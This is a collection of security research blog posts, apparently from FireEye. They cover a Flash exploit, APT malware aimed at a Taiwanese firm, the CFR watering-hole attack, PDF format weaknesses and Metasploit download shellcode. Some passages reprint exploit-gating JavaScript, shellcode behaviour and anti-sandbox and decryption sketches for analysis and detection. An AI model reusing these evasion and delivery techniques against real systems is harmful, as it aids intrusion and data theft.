On mining our database we found multiple domains associated with this threat:

The md5's of crafted document files are listed below:



We will continue to research this threat and provide updates as we find more information.

[Update: February 8, 2013]

Yesterday, we blogged about the new Flash exploit we identified in the wild on February 5, 2013. Since then, AlienVault has also published a blog detailing the threat. Peleus Uhley from Adobe published some information on a new feature in the upcoming version of Flash. This feature identifies whether Flash content is being run from within an older version of Office that lacks protected mode and warns the user of potentially malicious content before it is executed. Every extra step that makes the attacker's job more difficult counts.

It is interesting to note, as also observed by AlienVault, that the Flash content and the payloads are not obfuscated or encrypted at all. That is odd and sloppy for a threat attempting industrial espionage.

We continued looking into the payload that is part of this exploit and found some additional interesting behavior. The malware creates a registry entry under "HKEY_CURRENT_USER\Software\Classes\softbin." The value of this registry key is a large amount of XOR-encrypted data; the key used for this encryption was 0xC4. The decrypted data is shown in Figure 6. After some initial data, the decrypted content contains an embedded executable. This executable contains code for HTTP POSTs, as seen in Figure 7.


Figure 6


Figure 7

After allowing the malware to run for an extended period of time we observed HTTP POSTs being generated by the malware. The URI is incremented sequentially in these requests.


Figure 8

The HTTP POST data for these requests is the same as shown below. The CnC server is not responding to the POSTs at this time.


Figure 9

[Update: February 12, 2013]

After further analysis, we have confirmed that the exploit used in the analyzed documents is CVE-2013-0634 and not CVE-2013-0633 as originally stated.



This post was written by FireEye researchers Josh Gomez, Thoufique Haq, and Yichong Lin.

Hackers Targeting Taiwanese Technology Firm

In the past, hackers have attempted to compromise targeted organizations by sending phishing email directly to their users. However, there has been a shift away from this trend in recent years. Hackers have been observed conducting multi-pronged approaches, targeting the organization of interest as well as its affiliated companies. For example, in July 2011, ESTsoft's ALZip update server was compromised in an attack on CyWorld and Nate users.

In one of our investigations, a malicious email was found to be targeting a Taiwanese technology company that deals heavily with the finance services industry (FSI) and the government in Taiwan (see Figure 1 below). To trick the user into opening the malicious document, the attacker made use of an announcement by the Taiwanese Ministry of Finance (see Figure 2).

1. Email

Figure 1. Email targeting Taiwanese technology firm

2. news

Figure 2. Related Taiwanese news — Radio Taiwan International (2012)

The malicious document was password-protected using the auspicious number "888888." In Chinese, the number eight (pinyin "ba") is auspicious because it sounds like "fa" (发), which means gaining wealth. By encrypting the malicious payload using the default Word protection mechanism, the attacker could effectively evade pattern-matching detection without using a zero-day exploit. In this case, the attacker exploited the vulnerability CVE-2012-0158 in "MSCOMCTL.ocx." The technical analysis is detailed in the following sections: Protected Document Analysis, Shellcode Analysis, Payload Analysis, and Indicators of Compromise.

Protected Document Analysis

As shown in Figure 3, the ExifTool indicates that the hacker was using a simplified Chinese environment. This is interesting because it contradicts the email content that was written in traditional Chinese, which is the language mainly used in Taiwan.

It was also observed that the malicious Word document loaded "MSCOMCTL.ocx" prior to exploiting the application, as depicted in Figure 4.


Figure 3. ExifTool information


Figure 4. Loading of MSCOMCTL.OCX

The attacker leveraged CVE-2012-0158 to exploit unpatched versions of Microsoft Word. The vulnerable code inside MSCOMCTL copies the malicious data into the stack, overwriting the return pointer with 0x27583C30 (see Figure 5). The purpose of overwriting the return pointer is to control EIP in order to execute the malicious shellcode loaded into the stack. The instruction disassembled at 0x27583C30 is JMP ESP, which effectively executes the shellcode in the stack (see Figure 6).


Figure 5. Corrupting the stack

6. ForceJmpEsp

Figure 6. JMP ESP

Shellcode Analysis

The shellcode was analyzed to perform the following tasks:

  1. Decrypt and copy the malicious executable (payload) to the temp folder as "A.tmp"
  2. Launch "A.tmp" with WinExec
  3. Delete Word Resiliency registry key (using Shlwapi.SHDeleteKeyA) to prevent Word application from performing recovery
  4. Decrypt and copy the decoy Word document into the temp folder
  5. Launch decoy document using the WinExec command.
    Command line is as follows: cmd.exe /c tasklist&"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" "%temp%\<name of the malicious document>" /q
  6. Terminate compromised Word application

The shellcode made heavy use of the hook-hopping technique to bypass inline hooks patched in by API-monitoring software such as host-based IPS and AV (see Figure 7). By doing so, the shellcode can invoke an API without the knowledge of the monitoring software. The same technique was used in the Operation Aurora attack against Google.

7. Hook-hopping

Figure 7. Hook-hopping technique

The body of the shellcode was encrypted with a simple XOR key, 0x70, to deter analysis (see Figure 8).

Figure 8. Before/After decrypting shellcode

The encrypted executable and decoy files were embedded within the malicious document at offsets 0x10000 and 0x48000, respectively. Both payloads were encrypted using the same algorithm, a counter-based XOR with ROR (see below).

9. Embedded file decryption

Figure 9. Embedded file decryption
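The exact parameters of the counter-based XOR-with-ROR routine aren't spelled out in the post, but a decryptor of that general shape might look like the following sketch; the key schedule and rotation counts here are illustrative, not recovered from the sample:

```python
def ror8(value: int, count: int) -> int:
    """Rotate an 8-bit value right by count bits."""
    count &= 7
    return ((value >> count) | (value << (8 - count))) & 0xFF

def rol8(value: int, count: int) -> int:
    """Rotate an 8-bit value left by count bits (inverse of ror8)."""
    return ror8(value, 8 - (count & 7))

def decrypt(data: bytes, key: int) -> bytes:
    """Counter-based XOR with ROR: rotate each byte by a counter-derived
    amount, then XOR with a counter-advanced key (illustrative scheme)."""
    return bytes(ror8(b, i & 7) ^ ((key + i) & 0xFF) for i, b in enumerate(data))

def encrypt(data: bytes, key: int) -> bytes:
    """Inverse of decrypt, for testing the round trip."""
    return bytes(rol8(b ^ ((key + i) & 0xFF), i & 7) for i, b in enumerate(data))
```

Recovering the real parameters from a sample is usually a matter of reading the decryption loop in a disassembler and transcribing the rotation count and key update.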

Payload Analysis

This APT malware is stealthy and complex due to the number of anti-analysis techniques it deploys. It makes use of multi-staging, hook-hopping, encryption, anti-sandboxing, and anti-disassembly techniques to deter both behavioral analysis and (dynamic/static) code analysis. The attacker clearly took deliberate effort to evade both automated (signature- and sandbox-based) and manual analysis of the malware to delay or evade detection.

After the shellcode extracted the malicious payload "A.tmp" and the decoy document, "A.tmp" was executed. When first executed, "A.tmp" duplicated itself under a filename generated with the "GetTempFileName" API using "Del" as the prefix; an example of the generated filename is "DelA.tmp." Before "A.tmp" terminated, it executed its duplicate with the command line parameters "<process handle> <module path>." The spawned duplicate used the process handle to wait for "A.tmp" to terminate, deleted it using the module path, and then continued executing the rest of the malicious code.

While debugging "DelA.tmp," it is interesting to note the anti-sandbox technique used. The check depicted in Figure 10 tests whether the "Sleep" API has been manipulated by a sandbox. For example, a sandbox could skip the Sleep API call without accounting for the "accelerated" time; when the malware then reads the system time before and after a Sleep call, the difference could be less than a second. In this case, if the time difference around a two-second sleep is not more than one second, the malware assumes it is running inside a sandbox and terminates itself.

10. Anti-Sandbox

Figure 10. Anti-sandbox trick
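A user-mode equivalent of that timing check might look like the following sketch (the threshold values are illustrative):

```python
import time

def sleep_was_accelerated(seconds: float = 2.0, tolerance: float = 1.0) -> bool:
    """Mimic the malware's anti-sandbox check: sleep, then see whether
    wall-clock time actually advanced. A sandbox that skips or
    accelerates Sleep makes the elapsed time implausibly short."""
    start = time.monotonic()
    time.sleep(seconds)
    elapsed = time.monotonic() - start
    return elapsed < seconds - tolerance
```

In the sample, a True result (the sleep "returned too fast") causes the malware to terminate itself before doing anything observable.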

Before continuing to the next stage of infection, "DelA.tmp" decrypted a resource and injected it into the memory space of a suspended "C:\Windows\notepad.exe" process that it had launched. Before the process was resumed, EAX in the thread context was updated with the starting address of the injected malicious code (see Figure 11), because when a process starts, EAX is referenced for the starting address. Doing so disrupts debugging. As a countermeasure, an analyst can use memory-modifying software to change the memory content of Notepad.exe at the address indicated by EAX (0x0100 1130) to "EB FE" (the opcode for JMP -2). This way, the process resumes in a spin-lock, allowing the analyst to attach a debugger to the process and continue debugging the injected malicious code.

11. ModifyEAX

Figure 11. EAX of thread context to point to start of malicious code

To further complicate the situation, the injected code dropped a DLL named "irron.dll" and registered it as a Windows service. While debugging this DLL inside "ServiceMain," it was observed that the section named "test" was decrypted, and the decrypted content was run as code in a separate thread to deter static code analysis. Inside this newly spawned thread, all the secrets were encrypted, and anti-disassembly tricks were used to counter reverse engineering. For example, strings are deliberately placed between instructions to confuse the disassembler, exploiting the code-data duality property (see Figure 12).


Figure 12. Anti-disassembly codes

This Windows service was analyzed to be an information stealer, which allows remote control by the attacker, communicating with its CnC server domain over TCP port 15836. The figure below reveals how this multi-staged infection was conducted.


Figure 13. Flow of APT malware infection

Taking a deeper look into the registered domain, it is interesting to see that it was registered in September 2012, not long before the attack against the Taiwanese company (see figure below). Additionally, the domain was registered with Shanghai Yovole Networks, Inc., based in China, which could imply that the attack originated from China. It is also observed that the registrar did not validate the name used by the attacker: "William" should be read as a single name rather than as separate first and last names.


Figure 14. Registered malicious domain


Indicators of Compromise

The presence of the following file, system, and network artifacts (generated by the shellcode and dropped executable payload) could indicate that a computer is compromised.

  1. %temp%/<filename of malicious document>
  2. %temp%/Del%c.tmp (it may appear as "DelA.tmp", etc.)
  3. %windir%/System32/irron.dll
  4. Event name "DragonOK"
  5. Registered service "irmon" with the description, "The irmon service monitors for infrared devices such as mobile phones, and initiates the file transfer wizard."
  6. Resolving "" and connecting to "15836"
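A small sketch of how the file artifacts above could be swept for with Python. The directories are passed in rather than hard-coded, so the same check works against a live system or a mounted image; `Del?.tmp` covers the variable character in `Del%c.tmp`:

```python
import fnmatch
import os

# File-name patterns taken from the IOC list above.
IOC_PATTERNS = {
    "temp": ["Del?.tmp"],          # e.g. "DelA.tmp"
    "system32": ["irron.dll"],
}

def scan_for_iocs(temp_dir: str, system32_dir: str) -> list:
    """Return full paths of files matching the file IOC patterns."""
    hits = []
    for directory, patterns in ((temp_dir, IOC_PATTERNS["temp"]),
                                (system32_dir, IOC_PATTERNS["system32"])):
        try:
            names = os.listdir(directory)
        except OSError:
            continue               # directory absent or unreadable
        for pattern in patterns:
            hits.extend(os.path.join(directory, name)
                        for name in names
                        if fnmatch.fnmatch(name, pattern))
    return hits
```

The event name, the registered service, and the network beacon would additionally need to be checked through the Windows event, service, and DNS logs, which this sketch omits.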


Targeted attacks continue to be real threats, where one incident is considered too many. In this example, we can see that the attack plan was deliberate. Attackers try to reach their target by phishing companies affiliated with it, which can be even more effective than spear phishing the well-defended target itself. Hence, it is recommended that organizations ensure that all their closely affiliated companies are at least equally protected.

Additionally, a number of tell-tale signs indicate that this malware could have originated from China. Firstly, the Word document was created in a simplified Chinese environment despite the use of traditional Chinese inside the email body. Secondly, the domain was registered with a company located in Shanghai. Thirdly, the malware used the event name "DragonOK," where Dragon is an auspicious creature in Chinese mythology and folklore.

Lastly, we observed that APT malware is becoming increasingly complex with the use of anti-analysis techniques. Hence, it is important to defend the organization against traditional and modern threats through policy, awareness programs, and technologies.


1 Command Five Pty Ltd. (September 2011). SK Hack by an Advanced Persistent Threat. Retrieved from

2 Radio Taiwan International. (November 28, 2012). Retrieved from

3 Liston, T., & Skoudis, E. (2006). On the Cutting Edge: Thwarting Virtual Machine Detection.


CFR Watering Hole Attack Details

[Updated on December 30, 2012] On December 27, we received reports that the Council on Foreign Relations (CFR) website was compromised and hosting malicious content on or around 2:00 PM EST on Wednesday, December 26. Through our Malware Protection Cloud, we can confirm that the website was compromised at that time, but we can also confirm that the CFR website was hosting the malicious content as early as Friday, December 21—right before a major U.S. holiday.

We can also confirm that the malicious content hosted on the website does appear to use Adobe Flash to generate a heap spray attack against Internet Explorer version 8.0 (fully patched), which was the source of the zero-day vulnerability. We have chosen not to release the technical details of this exploit, as Microsoft is still investigating the vulnerability at this time.

In the meantime, the initial JavaScript hosting the exploit has some interesting features. To start, it appears the JavaScript only served the exploit to browsers whose operating system language was either English (U.S.), Chinese (China), Chinese (Taiwan), Japanese, Korean, or Russian:

var h=navigator.systemLanguage.toLowerCase();
if(h!="zh-cn" && h!="en-us" && h!="zh-tw" && h!="ja" && h!="ru" && h!="ko")

Also, the exploit used browser cookies to ensure that the exploit is only delivered once for every user:

var num=DisplayInfo();
if(num >1)

where DisplayInfo() essentially tracked when the page was last visited through browser cookies:

function DisplayInfo() {
    var expdate = new Date();
    var visit;
    expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000 * 7));  // one week
    if (!(visit = GetCookie("visit")))
        visit = 0;
    SetCookie("visit", visit, expdate, "/", null, false);
    return visit;
}
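The gate is easy to restate: keep a per-visitor counter and serve the exploit only on the first visit. A sketch of the equivalent logic in Python (the dict stands in for the browser's cookie jar; note the JavaScript shown never increments `visit`, so the increment below is an assumption about the intended behavior):

```python
def display_info(cookies: dict) -> int:
    """Bump and return the per-visitor counter, mirroring DisplayInfo().
    (Cookie expiry in the original: 24 * 60 * 60 * 1000 * 7 ms = 7 days.)"""
    visit = int(cookies.get("visit", 0)) + 1   # assumed increment
    cookies["visit"] = visit
    return visit

jar = {}
print(display_info(jar))   # first visit: the exploit would be served
print(display_info(jar))   # num > 1: the exploit is withheld
```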

Once those initial checks passed, the JavaScript proceeded to load a flash file "today.swf", which ultimately triggered a heap spray in Internet Explorer in order to complete the compromise of the endpoint.

Prior to downloading the exploit, the browser downloads "xsainfo.jpg" into the browser cache (a "drive-by cache" attack). This file is the dropper, encoded using a single-byte XOR (key: 0x83, ignoring 0x00 and 0x83 bytes). Once the exploit succeeds, the JPG file is decoded into a DLL, which is written to the %TEMP% folder as "flowertep.jpg". The sample (MD5: 1e90bd550fa8b288764dd3b9f90425f8, MD5: 715e692ed2b48e455734f2d43b936ce1) appears to contain debugging information in the metadata of the file:
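A sketch of the dropper decoding just described, assuming "ignoring 0x00 and 0x83 bytes" means those byte values pass through unchanged (a common trick that keeps long zero runs intact):

```python
def decode_dropper(blob: bytes, key: int = 0x83) -> bytes:
    """Single-byte XOR decode; 0x00 and the key byte are left as-is."""
    return bytes(b if b in (0x00, key) else b ^ key for b in blob)

# A PE file starts with "MZ": 'M' ^ 0x83 = 0xCE and 'Z' ^ 0x83 = 0xD9,
# so an encoded DLL would begin CE D9 and decode back to MZ.
print(decode_dropper(b"\xce\xd9\x00\x83"))
```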


The simplified Chinese <文件说明> translates to <File Description>. It looks like the malware author included additional metadata in the file, referencing "test_gaga.dll" as the internal name of this sample.

[Update: December 30, 2012]

Additionally, another binary, "shiape.exe" (MD5: a2e119106c38e09d2202e2a33e64adc9), is initially dropped to the %TEMP% folder and executed. It appears to perform code injection against the standard IE "iexplore.exe" process and installs itself as "%PROGRAMFILES%\Common Files\DirectDB.exe", using the HKLM\SOFTWARE\STS\"nck" registry key to maintain state information. We can also confirm Jaime Blasco's (AlienVault) findings, where the malware registers "DirectDB.exe" through the active setup registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\, so that this executable starts once per user upon subsequent login. However, while AlienVault's IOC mentions a process handle name of "&!#@&", we have actually found that the "shiape.exe" process generates a mutex of \BaseNamedObjects\&!#@& upon execution, as well.

As of December 29, Microsoft released a security advisory (2794220), which provides initial details of the zero-day vulnerability. Additionally, CVE-2012-4792 has been assigned to track this vulnerability over time.

Simultaneously, Metasploit developers have analyzed the vulnerability and Eric Romang released details of the CDwnBindInfo Proof of Concept Vulnerability demonstration for independent verification.

Lastly, Cristian Craioveanu and Jonathan Ness with MSRC Engineering posted further technical details on MS Technet about ways to mitigate CVE-2012-4792, in the meantime. 

One interesting side-note that MSRC mentioned is:

On systems where the vulnerability is not present, this Javascript snippet will have the side effect of initiating an HTTP GET request with the encoded heap spray address in it. A network log or proxy log would reveal the following HTTP requests:

GET /exploit.html HTTP/1.1

GET /%E0%B4%8C%E1%82%AB HTTP/1.1

As you can see, the value 0x10AB0C0D is encoded in UTF-8 and sent as part of the HTTP request. Real-world exploits will differ, and the heap spray address will vary depending on the targeted OS platform and exploit mechanism, but if you see encoded memory addresses in your proxy log, you should investigate to determine whether your organization has been targeted.
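To see what those percent-escapes hold, decode them back to Unicode code points; the two characters carry 16-bit pieces of the sprayed address 0x10AB0C0D (0x10AB appears directly, while the ordering of the remaining bytes is exploit-specific). A quick check with Python's standard library:

```python
from urllib.parse import unquote

# The encoded request path from the proxy-log example above.
path = "%E0%B4%8C%E1%82%AB"

# Percent-decoding yields UTF-8 bytes, which decode to two characters.
chars = unquote(path)
print([hex(ord(c)) for c in chars])
```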

Yet, in the wild, we have seen cases where a successfully compromised endpoint generates an equivalent encoded pattern:


... and still beacons (via HTTP POST) to the initial command and control infrastructure at [REDACTED].yourtrap.com. Therefore, we encourage security operations analysts to fully investigate endpoints that generate the encoded heap spray network traffic, rather than simply assuming those systems are not compromised.

We will continue to update this blog with further details, as we discover new information about this attack.

OMG-WTF-PDF Dénouement

You may have heard something in the news about PDF recently… By the power of Google!

What's all this then?

I gave a presentation at the 27th Chaos Computer Congress in Berlin.

For some reason, the slides never made it from Pentabarf to the Fahrplan. You can view them here: 27C3_Julia_Wolf_OMG-WTF-PDF.pdf

(I have had so many requests for these.)

The talk was approximately a twenty-minute summary of about 2,500 pages of dense technical documentation, twenty minutes of "I wonder what Acrobat does if I feed it this," and a little bit of (incomplete) stuff about A/V programs — because every talk like this has to mention A/V, because everyone asks about it. Speaking of which: if anyone would like to perform a rigorous test of how well A/V detects obfuscated PDFs, please go right ahead; I have neither the time nor the interest.

(That 2,500 is just for the ISO spec, PDF32000_2008.pdf; the Javascript Reference 8.1 from the SDK, js_api_reference.pdf ; and the XML Forms Architecture Specification 2.6, xfa_spec_2_6.pdf. I'm not counting the 3D Annotation specification, XMP specification, nor any of the font specifications.)

I was inspired by the 2009 work of Meredith L. Patterson, Len Sassaman, Moxie Marlinspike, Dan Kaminsky, Sergey Bratus, and any one else I may have forgotten, on ambiguities in ASN.1 and X.509 parsing.

As I read through the PDF ISO specification two years ago, certain oddities jumped out at me. I can't possibly be the first person to have read the specification and noticed this stuff, right? Right?

Can you really just execute arbitrary programs from a PDF? [Answer: Yes (And more than one PDF reader does this!)]

While reading the ISO 32000-1 [PDF] document - or really any technical specification - what you really need to pay the most attention to is what is not said. Not only is ISO 32000-1 absent any formal language definition (BNF, etc.), but many of the constructs that can be formed are simply never defined. (As it says right at the very beginning of ISO 32000-1, there's nothing in the document that defines whether or not a PDF file is well-formed.)

It's called Adobe Acrobat because it'll bend over backwards!

Since I started presenting this, several unrelated people have told me that they were using foo-trick, or bar-trick for years, but I seem to be the first person to stand in front of a room, and tell people about it for an hour. (Well, that and the first to make hybridized PDF files.)

Considering the existence of PDF/A, a committee somewhere must have had the same ideas about tightening up the PDF specification.

Part of the original brainstorm for this talk was to create a chart of features/quirks across several different PDF readers and versions.

That could have taken way more time than I could have invested at the time.

If anyone would like to actually perform these tests, I encourage you to please do so, and publish your results. I'll be posting the test files I used for my talk soon.

Live in Person

iSec Open Forum

I'm speaking at the iSEC Open Forum Bay Area next week. This is the info I have on it:

iSEC Open Forum Bay Area


DATE: Thursday, February 3, 2011


TIME: 6:00pm-9:00pm


LOCATION: Intuit Building 9, Cook Conference Room
                  2600 Casey Ave
                  Mountain View, CA 94043

Please visit or RSVP to rsvp @ if you wish to attend!

***technical managers and engineers only please***

***food and beverage provided***


I'm also speaking at TROOPERS in Heidelberg, Germany on Mar 28-Apr 1, 2011. It will be about PDF, but not the same stuff as 27C3.


Adobe Reader X

I wrote the bulk of this talk back in May for PH-Neutral 0x7DA. Adobe Acrobat X hadn't even been announced yet. The CCC submission deadline was three months ago.

A month before my talk, Adobe Reader X was released.

So, I should have updated my talk to mention Acrobat X more prominently, rather than in passing at the end. However, I've done no testing with it at all.

If you haven't heard yet, Adobe Acrobat X runs (most of) itself within a sandbox, which is probably the only feasible way for Adobe to secure Acrobat. I tested my tiny Javascript-launching PDF test file in it, and it still worked just like in 9.0; that's about all I know currently about its parser.

About PDF Printer Engines

So, I did not say that you can scan a network from a printer with a PDF. I was speculating about just how much of the PDF spec a printer may implement.

If it did implement the whole thing, then crazy stuff like scanning a network via a printer would be possible, and I'd be very surprised if any printer maker would ever do that.

I've been informed by someone familiar with HP printers that the HP PDF engine does not execute Javascript. I have no information about any other printer.

Not OpenGL

I reread the ISO specification, and found that it says that 3D data is encoded in the Universal 3D format (ECMA-363); Not OpenGL like I said.

Error in Presentation Tests

Paul Baccas has a pretty good summary of most public research on this kind of thing here:

He's quite possibly the only other person on Earth who's actually read through my test files, and actually found an error with one.

Most of my tests were written in one day. I think I spent maybe five minutes on the duplicate object tests, so messing up the startxref is no surprise.

This means that Slide 123 and Slide 124 in the 27C3 [PDF] talk are the exact opposite of what they should say. The first Object will be used if the xref points to it; otherwise, if the xref is broken, the last Object defined is used.

(This actually seems much more consistent with Acrobat's other behaviors.)

Stuff I forgot to mention

PDF syntax seems to have been influenced by TeX

Office, OpenOffice, and iWork documents are ZIP files; Java ARchives are ZIP files. Use your imagination.


I can barely fit the information I've got into 50 minutes. Acrobat has a lot of code, I mean A LOT, A LOT. Load it in gdb sometime and just list the symbols. It'll take about half an hour on a 2GHz Macbook.

That said, I should have at least mentioned PDF/A, and its cousin PDF/X.

Short summary (what I'd say in my talk): PDF/A is a stripped-down version of the PDF-1.4 spec, with mandatory font embedding, without Javascript and all that nonsense, and with tighter requirements on the PDF syntax itself. For example, the first byte of "%PDF-" must be at file offset zero. I don't know how many readers enforce these things in practice.
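A check for the offset-zero rule is a one-liner; for contrast, here is a sketch of the lenient behavior many readers are known to exhibit, accepting a header that starts some distance into the file (the 1024-byte window is the commonly cited leniency, not something PDF/A permits):

```python
def strict_header(data: bytes) -> bool:
    """PDF/A-style strictness: "%PDF-" must sit at file offset zero."""
    return data.startswith(b"%PDF-")

def lenient_header(data: bytes) -> bool:
    """What many readers actually accept: a header appearing anywhere
    in roughly the first 1024 bytes of the file."""
    return b"%PDF-" in data[:1024]

doc = b"some junk prefix %PDF-1.4 ..."
print(strict_header(doc), lenient_header(doc))
```

This gap between strict and lenient parsing is exactly what makes hybridized files (a PDF that is also something else) possible.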

The official ISO documentation is available for sale here:

Currently, it costs about US$125 if you'd like to buy a copy. There are actually several documents, but I think this is the main one. (I haven't read it.)

What of PDF/A? Attackers won't use it. Currently, an attacker can buy advertising which points to some HTML/JS which launches Acrobat in the browser to display a malicious PDF. And then the user gets 0wned. Happens thousands of times a day. Well, that and you don't need Javascript or other interactive features to exploit a PDF reader.

PDF/X is a stripped-down (e.g., no Javascript) version of PDF-1.4 which was created for the publishing industry, so there's lots of stuff about CMYK color space, embedded fonts, and trim area versus bleed area. There are several ISO documents which describe PDF/X.

PDF/UA is for Universal Accessibility, screen readers and the like. It should also make it possible to easily convert a PDF into a plain text document.

PDF/E is PDF for Engineering; just read the wiki page on it.


One More Thing

While Googling around to write this blog post, I discovered this: It's a PDF Syntax Validator. I don't know anything else about it other than what it says on that web page.

Frequently Asked Questions

I've got this dialogue going on in my head about many of the comments I've heard…


The Firſt Dialogue


Salviati, Sagredo, and Simplicio.

Salviati: IT was our yeſterdayes reſolution, and agreement, that we ſhould to day diſcourſe the moſt diſtinctly, and particularly we could poſſible of the natural reaſons, and their efficacy that have been hitherto alledged on the one or other part, by the maintainers of the Positions, Aristotelian, and Ptolomaique; and by the followers of the Portable Document Syſteem.

Sagredo: It has been evidently demonstrated that PDF sekurite is not good; What may be done in time to come? And forgive me if I continue in Modern English in order to save time.

Simplicio: You will be safe long as you keep patching your PDF software. And besides it will take a long time to learn how to use a new PDF reader.

Salviati: You will not be safe by just patching. Acrobat and Flash have had an actively-used-in-the-wild zero-day, installing malware, about every two months for the last three years. Sure, all PDF readers have vulnerabilities, and switching software is just exchanging one set of problems for another. However, most PDF readers won't run Javascript or play Flash upon open; the attack surface is much, much smaller. And really, a PDF reader is not hard to use. (Open file, read stuff, quit.)

Simplicio: Users should only open documents from people they trust.

Salviati: Most attacks performed via PDFs are drive-by attacks, that is, a malicious web page (sometimes a modified legitimate one, or a paid advertisement) instructed your web browser to open a PDF file in Acrobat. You don't have a choice in opening the malicious PDF file.

Simplicio: Everyone should switch to using PDF/A!

Salviati: Yes, let's have all the malware authors use PDF/A from now on!

This doesn't help mitigate vulnerabilities like integer overflows in embedded image handlers.

You could get everyone to reject old-style PDF documents, and only accept PDF/A…

You'd need to convert every single old PDF document on earth, but keep in mind that documents that accept form input won't function as a PDF/A. And you need everyone to throw out their old vulnerable PDF readers.

Sagredo: What's a good PDF reader to use that's not Adobe Acrobat?



Appendix A

This is a list of every version of my talk presented to more than 20 people at a time.

It's mostly the same talk each time, except with some new stuff added from the last time I presented it.

May 29, 2010 ph-neutral 0x7da PH-Neutral2010.pdf

Sep 09, 2010 SEC-T 2010 Sec-T_2010_Julia_Wolf_final.pdf

Oct 24, 2010 ToorCon 12 San Diego Julia_Wolf_ToorCon12_OMG_WTF.pdf

Oct 27, 2010 SecTor 2010 Julia_Wolf_SecTor_OMG_WTF.pdf

Dec 11, 2010 BayThreat 2010 BayThreat2010.pdf

Dec 30, 2010 27th Chaos Communication Congress 27C3_Julia_Wolf_OMG-WTF-PDF.pdf

[Part 1/4]

[Part 2/4]

[Part 3/4]

[Part 4/4]

Appendix B

On Sep 9, 2010, just after my presentation at Sec-T, I was interviewed by a reporter. This was the result:

Included here by permission of the copyright holder.

Adobe Reader is a tremendous risk
by Frida Sundkvist

Do you have Adobe Reader installed? Then neither your documents nor passwords are protected completely. Expert advice is to replace the PDF reader while Adobe solves the problems.

The last year has highlighted many security problems with PDF files. Often it's enough that a user has a PDF reader installed to be targeted by an attack.

– PDF is the biggest threat today. You can do almost anything without being detected. Adobe Reader is a tremendous risk, says Julia Wolf, security researcher at Fire Eye.

Julia Wolf is in Stockholm to speak at the Sec-T Security Conference. She says that despite that, it is good that people are discovering the problems with Adobe Reader or other PDF readers.

– My advice is to uninstall Adobe Reader and select another PDF reader, she says.

There are major weaknesses in the PDF format, which means that infected files are difficult to detect, and there are also vulnerabilities in Adobe Reader. Since Adobe's PDF reader is by far the most popular, hackers have put most of their resources into targeting Adobe.

A PDF attack often goes unnoticed. If the user has a PDF reader installed, it may be enough to accidentally go to the wrong website. Seconds later, your personal documents are uploaded to a waiting third party. Your keystrokes are recorded, and thus more people than just you may know your password.

– I have heard many different amounts on how much money companies lose. The conclusion is that there is a lot, she says.

In May, Julia Wolf experimented with rewriting a PDF file to see if antivirus software would detect the infected file. Only nine of 41 anti-virus programs detected it; the remaining 32 didn't. No surprise, says Julia Wolf.

Thomas Kristensen, security expert at Secunia, is on the same track. If users in a company do not need very advanced PDF files, the company should consider changing PDF readers.

– If you are a criminal and want to cause as much harm as possible, which route do you choose? In almost all cases, you choose Adobe Reader before for example Foxit, he says.

Two things will help if you still want to keep Adobe Reader. The first, according to Thomas Kristensen, is to disable two things: the Flash plugin and Javascript support. The second, he says, is instructing employees to only open files they need in their work.

Per Hellqvist, security expert at Symantec, does not think that the solution is to uninstall Adobe Reader, but he understands that line of thinking. He argues instead that it's most important to patch, that is to say to update the security settings in Reader.

– All PDF readers have security holes and it can take a long time to train users to use a new program, he says.

The only way to be protected from PDF attacks is to not have a PDF reader installed. Towards the end of the year comes the next update for Adobe Reader. This version will have isolated the program itself within a "sandbox" (see article above).

Photo Caption: [Some kind of Swedish idiom about poking fun at security, or saws, or something] Problems with Adobe Reader have been known for a long time. "You can do almost anything without being detected," said Julia Wolf, security researcher at Fire Eye, which calls on companies to use a different PDF reader until Adobe sorts out its program.

Appendix C

I can read French better than Google Translate, so this is the relevant excerpt from

The vulnerabilities of PDF

Over the last decade, the Portable Document Format, or PDF, has clearly become the most common format for the publication of electronic documents.

It is used in the publishing industry as a reference format as much for printing as for the publication of ebooks.

And the PDF reference implementation is still and always the popular Adobe Acrobat, in both versions, Writer or simply "Reader".

Unfortunately, as Julia Wolf mentioned in her presentation, PDF is a standard that has more or less been agglomerated on top of the needs of its original version, and Acrobat is the result of this organic evolution: at more than 15 million lines of code, Acrobat is bigger than Mozilla Firefox, bigger than the Linux kernel, and the majority of the code was written in the '90s, in Adobe's secret laboratories.

The result is that it's possible to easily fool Acrobat.

The syntax of PDF, along with the fact that the standard has no explicitly described method for validating PDF documents, allows the creation of PDF documents that are at the same time executables, that contain malicious code, or that pose as any of a number of other data formats.

In a PDF, one can call system commands, execute arbitrary programs, form documents that display different contents depending on the PDF reader program used, and so on.

Julia Wolf focused on Acrobat, because it is still today the most common PDF client, but the standard on which these programs are based is sufficiently confusing and complex that the exploitation of vulnerabilities is possible with each independent implementation.

Appendix D

Stuff that should be here, but isn't:

  • Testing Samples
  • PDF Portmanteau technical explanation
  • PDF Quine, with explanation
  • Misc. stuff, like that forwards-backwards-pages PDF file (It's in the Test Samples)

Once I've organized it all, I'll publish it on this blog. But I'm rushing to get this one [the blog post you're now reading] published.



Musings on download_exec.rb


This is not anything new and exciting¹, and should hopefully be familiar to some of you reading this. Some time ago I reversed the shellcode from Metasploit's download_exec module. It's a bit different from the rest of the stuff in MSF, because there's no source code with it, and it lacks certain features that the other shellcode[s] have (like being able to set the exit function).

When I started writing this blog post, the day before yesterday, I looked into the history of this particular scrap of code…

It's very similar to lion's downloadurl_v31.c available here:

… Except that that code seems to be a more recent version than the code in MSF. For example, it does the LSD-PL function-name hash trick, rather than lugging around the full function names for look-up (as the version in MSF does).

So, lion was a major figure in the Chinese 红客 Honker scene — literally translated as Red Guest (or Red Visitor, or Red Passenger). (Basically, hackers who are also Chinese nationalists.) His group was the Honker Union of China [HUC] — this site seems to have been dead for a while. He wrote a lot of code back in 2003 and 2004. (I'm now understanding a bit of this as I write these Chinese characters!)

I managed to dig up an older version of this 'downloadurl' code dated 2003-09-01 which is closer to the code in MSF. [archive] The code credits ey4s (from XFocus I think) for the actual shellcode.

Anyway, big chunks of this code, like the whole PEB method, also look like they were directly copied from Skape's old stuff (Dec 2003) — which was copied from Dino Dai Zovi (Apr 2003) — which was copied from Ratter/29A (Mar 2002) etc. etc. Like I said, this is all very old stuff. None of it has really changed since 2002, and it's still in very common use.

pita's contribution to all this appears to be wrapping up the blob of code output by the lion program above into an MSF2 module:

Meta Commentary

